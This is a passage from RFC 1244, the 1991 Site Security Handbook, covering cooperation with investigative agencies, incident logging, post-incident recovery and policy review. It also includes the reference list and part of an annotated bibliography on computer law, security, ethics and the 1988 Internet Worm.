avoid using electronic mail to communicate with other agencies (as
well as others dealing with the incident at hand). Non-secured
phone lines (e.g., the phones normally used in the business world)
are also frequent targets for tapping by network intruders, so be
careful!

Site Security Policy Handbook Working Group [Page 75]

RFC 1244 Site Security Handbook July 1991

There is no established set of rules for responding to an incident
when the U.S. Federal Government becomes involved. Except by
court order, no agency can force you to monitor, to disconnect
from the network, to avoid telephone contact with the suspected
attackers, etc.. As discussed in section 5.5.1, you should
consult the matter with your legal counsel, especially before
taking an action that your organization has never taken. The
particular agency involved may ask you to leave an attacked
machine on and to monitor activity on this machine, for example.
Your complying with this request will ensure continued cooperation
of the agency–usually the best route towards finding the source
of the network attacks and, ultimately, terminating these attacks.
Additionally, you may need some information or a favor from the
agency involved in the incident. You are likely to get what you
need only if you have been cooperative. Of particular importance
is avoiding unnecessary or unauthorized disclosure of information
about the incident, including any information furnished by the
agency involved. The trust between your site and the agency
hinges upon your ability to avoid compromising the case the agency
will build; keeping “tight lipped” is imperative.

Sometimes your needs and the needs of an investigative agency will
differ. Your site may want to get back to normal business by
closing an attack route, but the investigative agency may want you
to keep this route open. Similarly, your site may want to close a
compromised system down to avoid the possibility of negative
publicity, but again the investigative agency may want you to
continue monitoring. When there is such a conflict, there may be
a complex set of tradeoffs (e.g., interests of your site’s
management, amount of resources you can devote to the problem,
jurisdictional boundaries, etc.). An important guiding principle
is related to what might be called “Internet citizenship” [22,
IAB89, 23] and its responsibilities. Your site can shut a system
down, and this will relieve you of the stress, resource demands,
and danger of negative exposure. The attacker, however, is likely
to simply move on to another system, temporarily leaving others
blind to the attacker’s intention and actions until another path
of attack can be detected. Providing that there is no damage to
your systems and others, the most responsible course of action is
to cooperate with the participating agency by leaving your
compromised system on. This will allow monitoring (and,
ultimately, the possibility of terminating the source of the
threat to systems just like yours). On the other hand, if there
is damage to computers illegally accessed through your system, the
choice is more complicated: shutting down the intruder may prevent
further damage to systems, but might make it impossible to track
down the intruder. If there has been damage, the decision about
whether it is important to leave systems up to catch the intruder

Site Security Policy Handbook Working Group [Page 76]

RFC 1244 Site Security Handbook July 1991

should involve all the organizations effected. Further
complicating the issue of network responsibility is the
consideration that if you do not cooperate with the agency
involved, you will be less likely to receive help from that agency
in the future.

5.6 Documentation Logs

When you respond to an incident, document all details related to the
incident. This will provide valuable information to yourself and
others as you try to unravel the course of events. Documenting all
details will ultimately save you time. If you don’t document every
relevant phone call, for example, you are likely to forget a good
portion of information you obtain, requiring you to contact the
source of information once again. This wastes yours and others’
time, something you can ill afford. At the same time, recording
details will provide evidence for prosecution efforts, providing the
case moves in this direction. Documenting an incident also will help
you perform a final assessment of damage (something your management
as well as law enforcement officers will want to know), and will
provide the basis for a follow-up analysis in which you can engage in
a valuable “lessons learned” exercise.

During the initial stages of an incident, it is often infeasible to
determine whether prosecution is viable, so you should document as if
you are gathering evidence for a court case. At a minimum, you
should record:

o All system events (audit records).
o All actions you take (time tagged).
o All phone conversations (including the person with whom
you talked, the date and time, and the content of the
conversation).

The most straightforward way to maintain documentation is keeping a
log book. This allows you to go to a centralized, chronological
source of information when you need it, instead of requiring you to
page through individual sheets of paper. Much of this information is
potential evidence in a court of law. Thus, when you initially
suspect that an incident will result in prosecution or when an
investigative agency becomes involved, you need to regularly (e.g.,
every day) turn in photocopied, signed copies of your logbook (as
well as media you use to record system events) to a document
custodian who can store these copied pages in a secure place (e.g., a
safe). When you submit information for storage, you should in return
receive a signed, dated receipt from the document custodian. Failure
to observe these procedures can result in invalidation of any
evidence you obtain in a court of law.

Site Security Policy Handbook Working Group [Page 77]

RFC 1244 Site Security Handbook July 1991

6. Establishing Post-Incident Procedures

6.1 Overview

In the wake of an incident, several actions should take place. These
actions can be summarized as follows:

1. An inventory should be taken of the systems’ assets,
i.e., a careful examination should determine how the
system was affected by the incident,

2. The lessons learned as a result of the incident
should be included in revised security plan to
prevent the incident from re-occurring,

3. A new risk analysis should be developed in light of the
incident,

4. An investigation and prosecution of the individuals
who caused the incident should commence, if it is
deemed desirable.

All four steps should provide feedback to the site security policy
committee, leading to prompt re-evaluation and amendment of the
current policy.

6.2 Removing Vulnerabilities

Removing all vulnerabilities once an incident has occurred is
difficult. The key to removing vulnerabilities is knowledge and
understanding of the breach. In some cases, it is prudent to remove
all access or functionality as soon as possible, and then restore
normal operation in limited stages. Bear in mind that removing all
access while an incident is in progress will obviously notify all
users, including the alleged problem users, that the administrators
are aware of a problem; this may have a deleterious effect on an
investigation. However, allowing an incident to continue may also
open the likelihood of greater damage, loss, aggravation, or
liability (civil or criminal).

If it is determined that the breach occurred due to a flaw in the
systems’ hardware or software, the vendor (or supplier) and the CERT
should be notified as soon as possible. Including relevant telephone
numbers (also electronic mail addresses and fax numbers) in the site
security policy is strongly recommended. To aid prompt
acknowledgment and understanding of the problem, the flaw should be
described in as much detail as possible, including details about how
to exploit the flaw.

Site Security Policy Handbook Working Group [Page 78]

RFC 1244 Site Security Handbook July 1991

As soon as the breach has occurred, the entire system and all its
components should be considered suspect. System software is the most
probable target. Preparation is key to recovering from a possibly
tainted system. This includes checksumming all tapes from the vendor
using a checksum algorithm which (hopefully) is resistant to
tampering [10]. (See sections 3.9.4.1, 3.9.4.2.) Assuming original
vendor distribution tapes are available, an analysis of all system
files should commence, and any irregularities should be noted and
referred to all parties involved in handling the incident. It can be
very difficult, in some cases, to decide which backup tapes to
recover from; consider that the incident may have continued for
months or years before discovery, and that the suspect may be an
employee of the site, or otherwise have intimate knowledge or access
to the systems. In all cases, the pre-incident preparation will
determine what recovery is possible. At worst-case, restoration from
the original manufactures’ media and a re-installation of the systems
will be the most prudent solution.

Review the lessons learned from the incident and always update the
policy and procedures to reflect changes necessitated by the
incident.

6.2.1 Assessing Damage

Before cleanup can begin, the actual system damage must be
discerned. This can be quite time consuming, but should lead into
some of the insight as to the nature of the incident, and aid
investigation and prosecution. It is best to compare previous
backups or original tapes when possible; advance preparation is
the key. If the system supports centralized logging (most do), go
back over the logs and look for abnormalities. If process
accounting and connect time accounting is enabled, look for
patterns of system usage. To a lesser extent, disk usage may shed
light on the incident. Accounting can provide much helpful
information in an analysis of an incident and subsequent
prosecution.

6.2.2 Cleanup

Once the damage has been assessed, it is necessary to develop a
plan for system cleanup. In general, bringing up services in the
order of demand to allow a minimum of user inconvenience is the
best practice. Understand that the proper recovery procedures for
the system are extremely important and should be specific to the
site.

It may be necessary to go back to the original distributed tapes
and recustomize the system. To facilitate this worst case

Site Security Policy Handbook Working Group [Page 79]

RFC 1244 Site Security Handbook July 1991

scenario, a record of the original systems setup and each
customization change should be kept current with each change to
the system.

6.2.3 Follow up

Once you believe that a system has been restored to a “safe”
state, it is still possible that holes and even traps could be
lurking in the system. In the follow-up stage, the system should
be monitored for items that may have been missed during the
cleanup stage. It would be prudent to utilize some of the tools
mentioned in section 3.9.8.2 (e.g., COPS) as a start. Remember,
these tools don’t replace continual system monitoring and good
systems administration procedures.

6.2.4 Keep a Security Log

As discussed in section 5.6, a security log can be most valuable
during this phase of removing vulnerabilities. There are two
considerations here; the first is to keep logs of the procedures
that have been used to make the system secure again. This should
include command procedures (e.g., shell scripts) that can be run
on a periodic basis to recheck the security. Second, keep logs of
important system events. These can be referenced when trying to
determine the extent of the damage of a given incident.

6.3 Capturing Lessons Learned

6.3.1 Understand the Lesson

After an incident, it is prudent to write a report describing the
incident, method of discovery, correction procedure, monitoring
procedure, and a summary of lesson learned. This will aid in the
clear understanding of the problem. Remember, it is difficult to
learn from an incident if you don’t understand the source.

6.3.2 Resources

6.3.2.1 Other Security Devices, Methods

Security is a dynamic, not static process. Sites are dependent
on the nature of security available at each site, and the array
of devices and methods that will help promote security.
Keeping up with the security area of the computer industry and
their methods will assure a security manager of taking
advantage of the latest technology.

Site Security Policy Handbook Working Group [Page 80]

RFC 1244 Site Security Handbook July 1991

6.3.2.2 Repository of Books, Lists, Information Sources

Keep an on site collection of books, lists, information
sources, etc., as guides and references for securing the
system. Keep this collection up to date. Remember, as systems
change, so do security methods and problems.

6.3.2.3 Form a Subgroup

Form a subgroup of system administration personnel that will be
the core security staff. This will allow discussions of
security problems and multiple views of the site’s security
issues. This subgroup can also act to develop the site
security policy and make suggested changes as necessary to
ensure site security.

6.4 Upgrading Policies and Procedures

6.4.1 Establish Mechanisms for Updating Policies, Procedures,
and Tools

If an incident is based on poor policy, and unless the policy is
changed, then one is doomed to repeat the past. Once a site has
recovered from and incident, site policy and procedures should be
reviewed to encompass changes to prevent similar incidents. Even
without an incident, it would be prudent to review policies and
procedures on a regular basis. Reviews are imperative due to
today’s changing computing environments.

6.4.2 Problem Reporting Procedures

A problem reporting procedure should be implemented to describe,
in detail, the incident and the solutions to the incident. Each
incident should be reviewed by the site security subgroup to allow
understanding of the incident with possible suggestions to the
site policy and procedures.

7. References

[1] Quarterman, J., “The Matrix: Computer Networks and Conferencing
Systems Worldwide”, Pg. 278, Digital Press, Bedford, MA, 1990.

[2] Brand, R., “Coping with the Threat of Computer Security
Incidents: A Primer from Prevention through Recovery”, R. Brand,
available on-line from: cert.sei.cmu.edu:/pub/info/primer, 8 June
1990.

[3] Fites, M., Kratz, P. and A. Brebner, “Control and Security of

Site Security Policy Handbook Working Group [Page 81]

RFC 1244 Site Security Handbook July 1991

Computer Information Systems”, Computer Science Press, 1989.

[4] Johnson, D., and J. Podesta, “Formulating a Company Policy on
Access to and Use and Disclosure of Electronic Mail on Company
Computer Systems”, Available from: The Electronic Mail
Association (EMA) 1555 Wilson Blvd, Suite 555, Arlington VA
22209, (703) 522-7111, 22 October 1990.

[5] Curry, D., “Improving the Security of Your UNIX System”, SRI
International Report ITSTD-721-FR-90-21, April 1990.

[6] Cheswick, B., “The Design of a Secure Internet Gateway”,
Proceedings of the Summer Usenix Conference, Anaheim, CA, June
1990.

[7] Linn, J., “Privacy Enhancement for Internet Electronic Mail: Part
I — Message Encipherment and Authentication Procedures”, RFC
1113, IAB Privacy Task Force, August 1989.

[8] Kent, S., and J. Linn, “Privacy Enhancement for Internet
Electronic Mail: Part II — Certificate-Based Key Management”,
RFC 1114, IAB Privacy Task Force, August 1989.

[9] Linn, J., “Privacy Enhancement for Internet Electronic Mail: Part
III — Algorithms, Modes, and Identifiers”, RFC 1115, IAB Privacy
Task Force, August 1989.

[10] Merkle, R., “A Fast Software One Way Hash Function”, Journal of
Cryptology, Vol. 3, No. 1.

[11] Postel, J., “Internet Protocol – DARPA Internet Program Protocol
Specification”, RFC 791, DARPA, September 1981.

[12] Postel, J., “Transmission Control Protocol – DARPA Internet
Program Protocol Specification”, RFC 793, DARPA, September 1981.

[13] Postel, J., “User Datagram Protocol”, RFC 768, USC/Information
Sciences Institute, 28 August 1980.

[14] Mogul, J., “Simple and Flexible Datagram Access Controls for
UNIX-based Gateways”, Digital Western Research Laboratory
Research Report 89/4, March 1989.

[15] Bellovin, S., and M. Merritt, “Limitations of the Kerberos
Authentication System”, Computer Communications Review, October
1990.

[16] Pfleeger, C., “Security in Computing”, Prentice-Hall, Englewood

Site Security Policy Handbook Working Group [Page 82]

RFC 1244 Site Security Handbook July 1991

Cliffs, N.J., 1989.

[17] Parker, D., Swope, S., and B. Baker, “Ethical Conflicts:
Information and Computer Science, Technology and Business”, QED
Information Sciences, Inc., Wellesley, MA.

[18] Forester, T., and P. Morrison, “Computer Ethics: Tales and
Ethical Dilemmas in Computing”, MIT Press, Cambridge, MA, 1990.

[19] Postel, J., and J. Reynolds, “Telnet Protocol Specification”, RFC
854, USC/Information Sciences Institute, May 1983.

[20] Postel, J., and J. Reynolds, “File Transfer Protocol”, RFC 959,
USC/Information Sciences Institute, October 1985.

[21] Postel, J., Editor, “IAB Official Protocol Standards”, RFC 1200,
IAB, April 1991.

[22] Internet Activities Board, “Ethics and the Internet”, RFC 1087,
Internet Activities Board, January 1989.

[23] Pethia, R., Crocker, S., and B. Fraser, “Policy Guidelines for
the Secure Operation of the Internet”, CERT, TIS, CERT, RFC in
preparation.

[24] Computer Emergency Response Team (CERT/CC), “Unauthorized
Password Change Requests”, CERT Advisory CA-91:03, April 1991.

[25] Computer Emergency Response Team (CERT/CC), “TELNET Breakin
Warning”, CERT Advisory CA-89:03, August 1989.

[26] CCITT, Recommendation X.509, “The Directory: Authentication
Framework”, Annex C.

[27] Farmer, D., and E. Spafford, “The COPS Security Checker System”,
Proceedings of the Summer 1990 USENIX Conference, Anaheim, CA,
Pgs. 165-170, June 1990.

8. Annotated Bibliography

The intent of this annotated bibliography is to offer a
representative collection of resources of information that will help
the user of this handbook. It is meant provide a starting point for
further research in the security area. Included are references to
other sources of information for those who wish to pursue issues of
the computer security environment.

Site Security Policy Handbook Working Group [Page 83]

RFC 1244 Site Security Handbook July 1991

8.1 Computer Law

[ABA89]
American Bar Association, Section of Science and
Technology, “Guide to the Prosecution of Telecommunication
Fraud by the Use of Computer Crime Statutes”, American Bar
Association, 1989.

[BENDER]
Bender, D., “Computer Law: Evidence and Procedure”,
M. Bender, New York, NY, 1978-present.

Kept up to date with supplements.
Years covering 1978-1984 focuses on: Computer law,
evidence and procedures. The years 1984 to the current
focus on general computer law. Bibliographical
references and index included.

[BLOOMBECKER]
Bloombecker, B., “Spectacular Computer Crimes”, Dow Jones-
Irwin, Homewood, IL. 1990.

[CCH]
Commerce Clearing House, “Guide to Computer Law”, (Topical
Law Reports), Chicago, IL., 1989.

Court cases and decisions rendered by federal and state
courts throughout the United States on federal and state
computer law. Includes Case Table and Topical Index.

[CONLY]
Conly, C., “Organizing for Computer Crime Investigation and
Prosecution”, U.S. Dept. of Justice, Office of Justice
Programs, Under Contract Number OJP-86-C-002, National
Institute of Justice, Washington, DC, July 1989.

[FENWICK]
Fenwick, W., Chair, “Computer Litigation, 1985: Trial
Tactics and Techniques”, Litigation Course Handbook
Series No. 280, Prepared for distribution at the
Computer Litigation, 1985: Trial Tactics and
Techniques Program, February-March 1985.

[GEMIGNANI]
Gemignani, M., “Viruses and Criminal Law”, Communications
of the ACM, Vol. 32, No. 6, Pgs. 669-671, June 1989.

Site Security Policy Handbook Working Group [Page 84]

RFC 1244 Site Security Handbook July 1991

[HUBAND]
Huband, F., and R. Shelton, Editors, “Protection of
Computer Systems and Software: New Approaches for Combating
Theft of Software and Unauthorized Intrusion”, Papers
presented at a workshop sponsored by the National Science
Foundation, 1986.

[MCEWEN]
McEwen, J., “Dedicated Computer Crime Units”, Report
Contributors: D. Fester and H. Nugent, Prepared for the
National Institute of Justice, U.S. Department of Justice,
by Institute for Law and Justice, Inc., under contract number
OJP-85-C-006, Washington, DC, 1989.

[PARKER]
Parker, D., “Computer Crime: Criminal Justice Resource
Manual”, U.S. Dept. of Justice, National Institute of Justice,
Office of Justice Programs, Under Contract Number
OJP-86-C-002, Washington, D.C., August 1989.

[SHAW]
Shaw, E., Jr., “Computer Fraud and Abuse Act of 1986,
Congressional Record (3 June 1986), Washington, D.C.,
3 June 1986.

[TRIBLE]
Trible, P., “The Computer Fraud and Abuse Act of 1986”,
U.S. Senate Committee on the Judiciary, 1986.

8.2 Computer Security

[CAELLI]
Caelli, W., Editor, “Computer Security in the Age of
Information”, Proceedings of the Fifth IFIP International
Conference on Computer Security, IFIP/Sec ’88.

[CARROLL]
Carroll, J., “Computer Security”, 2nd Edition, Butterworth
Publishers, Stoneham, MA, 1987.

[COOPER]
Cooper, J., “Computer and Communications Security:
Strategies for the 1990s”, McGraw-Hill, 1989.

[BRAND]
Brand, R., “Coping with the Threat of Computer Security
Incidents: A Primer from Prevention through Recovery”,

Site Security Policy Handbook Working Group [Page 85]

RFC 1244 Site Security Handbook July 1991

R. Brand, 8 June 1990.

As computer security becomes a more important issue in
modern society, it begins to warrant a systematic approach.
The vast majority of the computer security problems and the
costs associated with them can be prevented with simple
inexpensive measures. The most important and cost
effective of these measures are available in the prevention
and planning phases. These methods are presented in this
paper, followed by a simplified guide to incident
handling and recovery. Available on-line from:
cert.sei.cmu.edu:/pub/info/primer.

[CHESWICK]
Cheswick, B., “The Design of a Secure Internet Gateway”,
Proceedings of the Summer Usenix Conference, Anaheim, CA,
June 1990.

Brief abstract (slight paraphrase from the original
abstract): AT&T maintains a large internal Internet that
needs to be protected from outside attacks, while
providing useful services between the two.
This paper describes AT&T’s Internet gateway. This
gateway passes mail and many of the common Internet
services between AT&T internal machines and the Internet.
This is accomplished without IP connectivity using a pair
of machines: a trusted internal machine and an untrusted
external gateway. These are connected by a private link.
The internal machine provides a few carefully-guarded
services to the external gateway. This configuration
helps protect the internal internet even if the external
machine is fully compromised.

This is a very useful and interesting design. Most
firewall gateway systems rely on a system that, if
compromised, could allow access to the machines behind
the firewall. Also, most firewall systems require users
who want access to Internet services to have accounts on
the firewall machine. AT&T’s design allows AT&T internal
internet users access to the standard services of TELNET and
FTP from their own workstations without accounts on
the firewall machine. A very useful paper that shows
how to maintain some of the benefits of Internet
connectivity while still maintaining strong
security.

Site Security Policy Handbook Working Group [Page 86]

RFC 1244 Site Security Handbook July 1991

[CURRY]
Curry, D., “Improving the Security of Your UNIX System”,
SRI International Report ITSTD-721-FR-90-21, April 1990.

This paper describes measures that you, as a system
administrator can take to make your UNIX system(s) more
secure. Oriented primarily at SunOS 4.x, most of the
information covered applies equally well to any Berkeley
UNIX system with or without NFS and/or Yellow Pages (NIS).
Some of the information can also be applied to System V,
although this is not a primary focus of the paper. A very
useful reference, this is also available on the Internet in
various locations, including the directory
cert.sei.cmu.edu:/pub/info.

[FITES]
Fites, M., Kratz, P. and A. Brebner, “Control and
Security of Computer Information Systems”, Computer Science
Press, 1989.

This book serves as a good guide to the issues encountered
in forming computer security policies and procedures. The
book is designed as a textbook for an introductory course
in information systems security.

The book is divided into five sections: Risk Management (I),
Safeguards: security and control measures, organizational
and administrative (II), Safeguards: Security and Control
Measures, Technical (III), Legal Environment and
Professionalism (IV), and CICA Computer Control Guidelines
(V).

The book is particularly notable for its straight-forward
approach to security, emphasizing that common sense is the
first consideration in designing a security program. The
authors note that there is a tendency to look to more
technical solutions to security problems while overlooking
organizational controls which are often cheaper and much
more effective. 298 pages, including references and index.

[GARFINKEL]
Garfinkel, S, and E. Spafford, “Practical Unix Security”,
O’Reilly & Associates, ISBN 0-937175-72-2, May 1991.

Approx 450 pages, $29.95. Orders: 1-800-338-6887
(US & Canada), 1-707-829-0515 (Europe), email: nuts@ora.com

This is one of the most useful books available on Unix

Site Security Policy Handbook Working Group [Page 87]

RFC 1244 Site Security Handbook July 1991

security. The first part of the book covers standard Unix
and Unix security basics, with particular emphasis on
passwords. The second section covers enforcing security on
the system. Of particular interest to the Internet user are
the sections on network security, which address many
of the common security problems that afflict Internet Unix
users. Four chapters deal with handling security incidents,
and the book concludes with discussions of encryption,
physical security, and useful checklists and lists of
resources. The book lives up to its name; it is filled with
specific references to possible security holes, files to
check, and things to do to improve security. This
book is an excellent complement to this handbook.

[GREENIA90]
Greenia, M., “Computer Security Information Sourcebook”,
Lexikon Services, Sacramento, CA, 1989.

A manager’s guide to computer security. Contains a
sourcebook of key reference materials including
access control and computer crimes bibliographies.

[HOFFMAN]
Hoffman, L., “Rogue Programs: Viruses, Worms, and
Trojan Horses”, Van Nostrand Reinhold, NY, 1990.
(384 pages, includes bibliographical references and index.)

[JOHNSON]
Johnson, D., and J. Podesta, “Formulating A Company Policy
on Access to and Use and Disclosure of Electronic Mail on
Company Computer Systems”.

A white paper prepared for the EMA, written by two experts
in privacy law. Gives background on the issues, and presents
some policy options.

Available from: The Electronic Mail Association (EMA)
1555 Wilson Blvd, Suite 555, Arlington, VA, 22209.
(703) 522-7111.

[KENT]
Kent, Stephen, “E-Mail Privacy for the Internet: New Software
and Strict Registration Procedures will be Implemented this
Year”, Business Communications Review, Vol. 20, No. 1,
Pg. 55, 1 January 1990.

Site Security Policy Handbook Working Group [Page 88]

RFC 1244 Site Security Handbook July 1991

[LU]
Lu, W., and M. Sundareshan, “Secure Communication in
Internet Environments: A Hierachical Key Management Scheme
for End-to-End Encryption”, IEEE Transactions on
Communications, Vol. 37, No. 10, Pg. 1014, 1 October 1989.

[LU1]
Lu, W., and M. Sundareshan, “A Model for Multilevel Security
in Computer Networks”, IEEE Transactions on Software
Engineering, Vol. 16, No. 6, Page 647, 1 June 1990.

[NSA]
National Security Agency, “Information Systems Security
Products and Services Catalog”, NSA, Quarterly Publication.

NSA’s catalogue contains chapter on: Endorsed Cryptographic
Products List; NSA Endorsed Data Encryption Standard (DES)
Products List; Protected Services List; Evaluated Products
List; Preferred Products List; and Endorsed Tools List.

The catalogue is available from the Superintendent of
Documents, U.S. Government Printing Office, Washington,
D.C. One may place telephone orders by calling:
(202) 783-3238.

[OTA]
United States Congress, Office of Technology Assessment,
“Defending Secrets, Sharing Data: New Locks and Keys for
Electronic Information”, OTA-CIT-310, October 1987.

This report, prepared for congressional committee considering
Federal policy on the protection of electronic information, is
interesting because of the issues it raises regarding the
impact of technology used to protect information. It also
serves as a reasonable introduction to the various encryption
and information protection mechanisms. 185 pages. Available
from the U.S. Government Printing Office.

[PALMER]
Palmer, I., and G. Potter, “Computer Security Risk
Management”, Van Nostrand Reinhold, NY, 1989.

[PFLEEGER]
Pfleeger, C., “Security in Computing”, Prentice-Hall,
Englewood Cliffs, NJ, 1989.

A general textbook in computer security, this book provides an
excellent and very readable introduction to classic computer

Site Security Policy Handbook Working Group [Page 89]

RFC 1244 Site Security Handbook July 1991

security problems and solutions, with a particular emphasis on
encryption. The encryption coverage serves as a good
introduction to the subject. Other topics covered include
building secure programs and systems, security of database,
personal computer security, network and communications
security, physical security, risk analysis and security
planning, and legal and ethical issues. 538 pages including
index and bibliography.

[SHIREY]
Shirey, R., “Defense Data Network Security Architecture”,
Computer Communication Review, Vol. 20, No. 2, Page 66,
1 April 1990.

[SPAFFORD]
Spafford, E., Heaphy, K., and D. Ferbrache, “Computer
Viruses: Dealing with Electronic Vandalism and Programmed
Threats”, ADAPSO, 1989. (109 pages.)

This is a good general reference on computer viruses and
related concerns. In addition to describing viruses in
some detail, it also covers more general security issues,
legal recourse in case of security problems, and includes
lists of laws, journals focused on computers security,
and other security-related resources.

Available from: ADAPSO, 1300 N. 17th St, Suite 300,
Arlington VA 22209. (703) 522-5055.

[STOLL88]
Stoll, C., “Stalking the Wily Hacker”, Communications
of the ACM, Vol. 31, No. 5, Pgs. 484-497, ACM,
New York, NY, May 1988.

This article describes some of the technical means used
to trace the intruder that was later chronicled in
“Cuckoo’s Egg” (see below).

[STOLL89]
Stoll, C., “The Cuckoo’s Egg”, ISBN 00385-24946-2,
Doubleday, 1989.

Clifford Stoll, an astronomer turned UNIX System
Administrator, recounts an exciting, true story of how he
tracked a computer intruder through the maze of American
military and research networks. This book is easy to
understand and can serve as an interesting introduction to
the world of networking. Jon Postel says in a book review,

Site Security Policy Handbook Working Group [Page 90]

RFC 1244 Site Security Handbook July 1991

“[this book] … is absolutely essential reading for anyone
that uses or operates any computer connected to the Internet
or any other computer network.”

[VALLA]
Vallabhaneni, S., “Auditing Computer Security: A Manual with
Case Studies”, Wiley, New York, NY, 1989.

8.3 Ethics

[CPSR89]
Computer Professionals for Social Responsibility, “CPSR
Statement on the Computer Virus”, CPSR, Communications of the
ACM, Vol. 32, No. 6, Pg. 699, June 1989.

This memo is a statement on the Internet Computer Virus
by the Computer Professionals for Social Responsibility
(CPSR).

[DENNING]
Denning, Peter J., Editor, “Computers Under Attack:
Intruders, Worms, and Viruses”, ACM Press, 1990.

A collection of 40 pieces divided into six sections: the
emergence of worldwide computer networks, electronic breakins,
worms, viruses, counterculture (articles examining the world
of the “hacker”), and finally a section discussing social,
legal, and ethical considerations.

A thoughtful collection that addresses the phenomenon of
attacks on computers. This includes a number of previously
published articles and some new ones. The previously
published ones are well chosen, and include some references
that might be otherwise hard to obtain. This book is a key
reference to computer security threats that have generated
much of the concern over computer security in recent years.

[ERMANN]
Ermann, D., Williams, M., and C. Gutierrez, Editors,
“Computers, Ethics, and Society”, Oxford University Press,
NY, 1990. (376 pages, includes bibliographical references).

[FORESTER]
Forester, T., and P. Morrison, “Computer Ethics: Tales and
Ethical Dilemmas in Computing”, MIT Press, Cambridge, MA,
1990. (192 pages including index.)

Site Security Policy Handbook Working Group [Page 91]

RFC 1244 Site Security Handbook July 1991

From the preface: “The aim of this book is two-fold: (1) to
describe some of the problems created by society by computers,
and (2) to show how these problems present ethical dilemmas
for computers professionals and computer users.

The problems created by computers arise, in turn, from two
main sources: from hardware and software malfunctions and
from misuse by human beings. We argue that computer systems
by their very nature are insecure, unreliable, and
unpredictable — and that society has yet to come to terms
with the consequences. We also seek to show how society
has become newly vulnerable to human misuse of computers in
the form of computer crime, software theft, hacking, the
creation of viruses, invasions of privacy, and so on.”

The eight chapters include “Computer Crime”, “Software
Theft”, “Hacking and Viruses”, “Unreliable Computers”,
“The Invasion of Privacy”, “AI and Expert Systems”,
and “Computerizing the Workplace.” Includes extensive
notes on sources and an index.

[GOULD]
Gould, C., Editor, “The Information Web: Ethical and Social
Implications of Computer Networking”, Westview Press,
Boulder, CO, 1989.

[IAB89]
Internet Activities Board, “Ethics and the Internet”,
RFC 1087, IAB, January 1989. Also appears in the
Communications of the ACM, Vol. 32, No. 6, Pg. 710,
June 1989.

This memo is a statement of policy by the Internet
Activities Board (IAB) concerning the proper use of
the resources of the Internet. Available on-line on
host ftp.nisc.sri.com, directory rfc, filename rfc1087.txt.
Also available on host nis.nsf.net, directory RFC,
filename RFC1087.TXT-1.

[MARTIN]
Martin, M., and R. Schinzinger, “Ethics in Engineering”,
McGraw Hill, 2nd Edition, 1989.

[MIT89]
Massachusetts Institute of Technology, “Teaching Students
About Responsible Use of Computers”, MIT, 1985-1986. Also
reprinted in the Communications of the ACM, Vol. 32, No. 6,
Pg. 704, Athena Project, MIT, June 1989.

Site Security Policy Handbook Working Group [Page 92]

RFC 1244 Site Security Handbook July 1991

This memo is a statement of policy by the Massachusetts
Institute of Technology (MIT) on the responsible use
of computers.

[NIST]
National Institute of Standards and Technology, “Computer
Viruses and Related Threats: A Management Guide”, NIST
Special Publication 500-166, August 1989.

[NSF88]
National Science Foundation, “NSF Poses Code of Networking
Ethics”, Communications of the ACM, Vol. 32, No. 6, Pg. 688,
June 1989. Also appears in the minutes of the regular
meeting of the Division Advisory Panel for Networking and
Communications Research and Infrastructure, Dave Farber,
Chair, November 29-30, 1988.

This memo is a statement of policy by the National Science
Foundation (NSF) concerning the ethical use of the Internet.

[PARKER90]
Parker, D., Swope, S., and B. Baker, “Ethical Conflicts:
Information and Computer Science, Technology and Business”,
QED Information Sciences, Inc., Wellesley, MA. (245 pages).

Additional publications on Ethics:

The University of New Mexico (UNM)

The UNM has a collection of ethics documents. Included are
legislation from several states and policies from many
institutions.

Access is via FTP, IP address ariel.umn.edu. Look in the
directory /ethics.

8.4 The Internet Worm

[BROCK]
Brock, J., “November 1988 Internet Computer Virus and the
Vulnerability of National Telecommunications Networks to
Computer Viruses”, GAO/T-IMTEC-89-10, Washington, DC,
20 July 1989.

Testimonial statement of Jack L. Brock, Director, U. S.
Government Information before the Subcommittee on
Telecommunications and Finance, Committee on Energy and

Site Security Policy Handbook Working Group [Page 93]

RFC 1244 Site Security Handbook July 1991

Commerce, House of Representatives.

[EICHIN89]
Eichin, M., and J. Rochlis, “With Microscope and Tweezers:
An Analysis of the Internet Virus of November 1988”,
Massachusetts Institute of Technology, February 1989.

Provides a detailed dissection of the worm program. The
paper discusses the major points of the worm program then
reviews strategies, chronology, lessons and open issues,
Acknowledgments; also included are a detailed appendix
on the worm program subroutine by subroutine, an
appendix on the cast of characters, and a reference section.

[EISENBERG89]
Eisenberg, T., D. Gries, J. Hartmanis, D. Holcomb,
M. Lynn, and T. Santoro, “The Computer Worm”, Cornell
University, 6 February 1989.

A Cornell University Report presented to the Provost of the
University on 6 February 1989 on the Internet Worm.

[GAO]
U.S. General Accounting Office, “Computer Security – Virus
Highlights Need for Improved Internet Management”, United
States General Accounting Office, Washington, DC, 1989.

This 36 page report (GAO/IMTEC-89-57), by the U.S.
Government Accounting Office, describes the Internet worm
and its effects. It gives a good overview of the various
U.S. agencies involved in the Internet today and their
concerns vis-a-vis computer security and networking.

Available on-line on host nnsc.nsf.net, directory
pub, filename GAO_RPT; and on nis.nsf.net, directory nsfnet,
filename GAO_RPT.TXT.

[REYNOLDS89]
The Helminthiasis of the Internet, RFC 1135,
USC/Information Sciences Institute, Marina del Rey,
CA, December 1989.

This report looks back at the helminthiasis (infestation
with, or disease caused by parasitic worms) of the
Internet that was unleashed the evening of 2 November 1988.
This document provides a glimpse at the infection,its
festering, and cure. The impact of the worm on the Internet
community, ethics statements, the role of the news media,

Site Security Policy Handbook Working Group [Page 94]

RFC 1244 Site Security Handbook July 1991

crime in the computer world, and future prevention is
discussed. A documentation review presents four publications
that describe in detail this particular parasitic computer
program. Reference and bibliography sections are also
included. Available on-line on host ftp.nisc.sri.com
directory rfc, filename rfc1135.txt. Also available on
host nis.nsf.net, directory RFC, filename RFC1135.TXT-1.

[SEELEY89]
Seeley, D., “A Tour of the Worm”, Proceedings of 1989
Winter USENIX Conference, Usenix Association, San Diego, CA,
February 1989.

Details are presented as a “walk thru” of this particular
worm program. The paper opened with an abstract,
introduction, detailed chronology of events upon the
discovery of the worm, an overview, the internals of the
worm, personal opinions, and conclusion.

[SPAFFORD88]
Spafford, E., “The Internet Worm Program: An
Analysis”, Computer Communication Review, Vol. 19,
No. 1, ACM SIGCOM, January 1989. Also issued as Purdue
CS Technical Report CSD-TR-823, 28 November 1988.

Describes the infection of the Internet as a worm
program that exploited flaws in utility programs in
UNIX based systems. The report gives a detailed
description of the components of the worm program:
data and functions. Spafford focuses his study on two
completely independent reverse-compilations of the
worm and a version disassembled to VAX assembly language.

[SPAFFORD89]
